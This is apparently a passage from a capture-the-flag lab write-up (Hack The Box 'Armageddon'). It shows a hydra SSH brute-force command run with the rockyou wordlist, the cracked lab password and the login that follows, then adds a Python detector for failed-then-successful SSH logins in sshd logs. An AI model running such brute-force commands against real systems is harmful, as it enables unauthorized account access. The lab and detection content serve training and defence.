Brute-force Attack


There appears to be a single system user: brucetherealadmin. While continuing the other enumeration, I will get hydra going for the brucetherealadmin user.

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ hydra -l brucetherealadmin -P /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 20:44:38
[warning] many ssh configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking ssh://10.10.10.233:22/
[status] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.10.10.233   login: brucetherealadmin   password: booboo

I was able to brute-force the password for the brucetherealadmin user against the target SSH service.

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ sshpass -p booboo ssh brucetherealadmin@$IP
last failed login: Mon Apr  3 19:46:20 BST 2023 from 10.10.14.2 on ssh:notty
There were 259 failed login attempts since the last successful login.
last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin
[brucetherealadmin@armageddon ~]$ hostname
armageddon.htb
[brucetherealadmin@armageddon ~]$ ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.233  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::7648:5ea1:5371:b3b5  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::69d1:bb00:780c:f997  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:77:2d  txqueuelen 1000  (Ethernet)
        RX packets 825407  bytes 140654223 (134.1 MiB)
        RX errors 0  dropped 24  overruns 0  frame 0
        TX packets 819341  bytes 302343349 (288.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1448  bytes 146156 (142.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1448  bytes 146156 (142.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

This is very unlikely in a real-world application. But here I am. Lateral movement made to the brucetherealadmin user.
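
From the defender's side, the pattern above (a burst of failed SSH password attempts for one account, then a successful login from the same source) is detectable in the sshd auth log. The following is an added example, not part of the original write-up: the log lines, source addresses, threshold and window are constructed assumptions, and the line format is the standard OpenSSH "Failed/Accepted password" syslog message.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format (not captured from the target host).
SAMPLE_LOG = "\n".join(
    [f"Apr  3 19:45:{s:02d} armageddon sshd[2{s:03d}]: Failed password for "
     f"brucetherealadmin from 192.0.2.10 port 4{s:04d} ssh2" for s in range(0, 12, 2)]
    + ["Apr  3 19:45:30 armageddon sshd[2200]: Failed password for invalid user "
       "admin from 192.0.2.77 port 50111 ssh2",
       "Apr  3 19:46:20 armageddon sshd[2300]: Accepted password for "
       "brucetherealadmin from 192.0.2.10 port 40200 ssh2",
       "Apr  3 19:50:00 armageddon sshd[2400]: Accepted password for "
       "brucetherealadmin from 198.51.100.5 port 51000 ssh2"]
)

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password "
    r"for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect(log_text, threshold=5, window=timedelta(minutes=1), year=2023):
    """Return (kind, source, user) alerts for failure bursts and for any
    successful password login that follows a burst from the same source."""
    failures = defaultdict(list)  # (source, user) -> failure times inside the window
    flagged = set()               # (source, user) pairs that crossed the threshold
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied by the caller.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, src = m.group(2), m.group(3), m.group(4)
        key = (src, user)
        if outcome == "Failed":
            # Sliding window: drop failures older than `window`, then add this one.
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("brute_force", src, user))
        elif key in flagged:
            # A guess succeeded: treat the account as compromised, not just probed.
            alerts.append(("success_after_brute_force", src, user))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The second alert kind is the one that matters for response: it separates noisy guessing from a guessed password, which calls for rotating the credential and reviewing the session.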